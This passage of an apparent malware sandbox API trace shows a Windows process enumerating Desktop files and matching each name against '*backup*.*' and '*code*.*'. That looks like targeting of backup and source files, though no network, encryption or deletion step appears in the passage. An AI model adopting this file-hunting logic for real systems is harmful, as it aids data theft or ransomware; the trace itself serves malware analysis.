| out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.918] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp" [0110.918] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.918] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.918] lstrcatW (in: lpString1="\\", lpString2="xmxJletH7GW6y.bmp" | out: lpString1="\\xmxJletH7GW6y.bmp") returned="\\xmxJletH7GW6y.bmp" [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.918] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea198 [0110.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", cchWideChar=49, lpMultiByteStr=0x38ea198, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\xmxJletH7GW6y.bmp", lpUsedDefaultChar=0x0) returned 49 [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2978 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea198 | out: hHeap=0x29a0000) returned 1 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970b60 [0110.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970b60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970b60 | out: hHeap=0x29a0000) returned 1 [0110.919] PathMatchSpecW (pszFile="xmxJletH7GW6y.bmp", pszSpec="*backup*.*") returned 0 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.919] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995fa10, ftCreationTime.dwHighDateTime=0x1d7a3b6, ftLastAccessTime.dwLowDateTime=0x6882a8f0, ftLastAccessTime.dwHighDateTime=0x1d7aec6, ftLastWriteTime.dwLowDateTime=0x6882a8f0, ftLastWriteTime.dwHighDateTime=0x1d7aec6, nFileSizeHigh=0x0, nFileSizeLow=0x94d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="yBTl 8ysJ.mp3", cAlternateFileName="YBTL8Y~1.MP3")) returned 1 [0110.919] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.919] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.919] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3" [0110.919] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.919] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.919] lstrcatW (in: lpString1="\\", lpString2="yBTl 8ysJ.mp3" | out: lpString1="\\yBTl 8ysJ.mp3") returned="\\yBTl 8ysJ.mp3" [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x39700d0 [0110.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", cchWideChar=45, lpMultiByteStr=0x39700d0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\yBTl 8ysJ.mp3", lpUsedDefaultChar=0x0) returned 45 [0110.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970bc0 [0110.920] PathMatchSpecW (pszFile="yBTl 8ysJ.mp3", pszSpec="*backup*.*") returned 0 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.920] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e10ef30, ftCreationTime.dwHighDateTime=0x1d7a5be, ftLastAccessTime.dwLowDateTime=0xe222b410, ftLastAccessTime.dwHighDateTime=0x1d7a972, ftLastWriteTime.dwLowDateTime=0xe222b410, ftLastWriteTime.dwHighDateTime=0x1d7a972, nFileSizeHigh=0x0, nFileSizeLow=0x1616d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZyW0U6HGvR1sY4.mkv", cAlternateFileName="ZYW0U6~1.MKV")) returned 1 [0110.920] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.920] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.920] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv" [0110.920] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.920] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.920] lstrcatW (in: lpString1="\\", lpString2="ZyW0U6HGvR1sY4.mkv" | out: lpString1="\\ZyW0U6HGvR1sY4.mkv") returned="\\ZyW0U6HGvR1sY4.mkv" [0110.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea298 [0110.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", cchWideChar=50, lpMultiByteStr=0x38ea298, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\ZyW0U6HGvR1sY4.mkv", lpUsedDefaultChar=0x0) returned 50 [0110.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2930 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea298 | out: hHeap=0x29a0000) returned 1 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.920] PathMatchSpecW (pszFile="ZyW0U6HGvR1sY4.mkv", pszSpec="*backup*.*") returned 0 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.920] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0110.920] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 1 [0110.920] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.920] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.920] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods" [0110.920] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.920] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.921] lstrcatW (in: lpString1="\\", lpString2="_aNuOe6kDQsgIz0qDq.ods" | out: lpString1="\\_aNuOe6kDQsgIz0qDq.ods") returned="\\_aNuOe6kDQsgIz0qDq.ods" [0110.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0110.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", cchWideChar=54, lpMultiByteStr=0x38ea5d8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\_aNuOe6kDQsgIz0qDq.ods", lpUsedDefaultChar=0x0) returned 54 [0110.921] PathMatchSpecW (pszFile="_aNuOe6kDQsgIz0qDq.ods", pszSpec="*backup*.*") returned 0 [0110.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.921] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbadff6a0, ftCreationTime.dwHighDateTime=0x1d7ab67, ftLastAccessTime.dwLowDateTime=0x51082c40, ftLastAccessTime.dwHighDateTime=0x1d7ad09, ftLastWriteTime.dwLowDateTime=0x51082c40, ftLastWriteTime.dwHighDateTime=0x1d7ad09, nFileSizeHigh=0x0, nFileSizeLow=0xe3d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aNuOe6kDQsgIz0qDq.ods", cAlternateFileName="_ANUOE~1.ODS")) returned 0 [0110.921] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0110.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0110.921] GetLastError () returned 0x12 [0110.921] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0110.921] lstrcpyW (in: lpString1=0x19d240, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.921] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*" [0110.921] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\*.*", lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743920 [0110.921] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.921] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.922] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\." [0110.922] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.922] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.922] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.922] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.922] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.922] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.922] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.922] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.922] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.922] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.922] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.922] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.922] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.922] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.922] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.922] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.922] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.922] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.922] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.922] lstrcatW (in: lpString1="\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="\\0zAI6IIW3Y-.jpg") returned="\\0zAI6IIW3Y-.jpg" [0110.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.922] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*code*.*") returned 0 [0110.922] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.922] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.922] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.923] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.923] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.923] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.923] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.923] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.923] lstrcatW (in: lpString1="\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="\\31NPwfpy_GlRh15.m4a") returned="\\31NPwfpy_GlRh15.m4a" [0110.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea718, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d20 [0110.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d20, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970600 [0110.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.923] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*code*.*") returned 0 [0110.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970600 | out: hHeap=0x29a0000) returned 1 [0110.923] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.923] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.923] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.923] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.923] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.923] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.923] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.923] lstrcatW (in: lpString1="\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="\\38ZOxe4ZNObW5Sq.pdf") returned="\\38ZOxe4ZNObW5Sq.pdf" [0110.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.923] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea6d8 [0110.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea6d8, cbMultiByte=51, 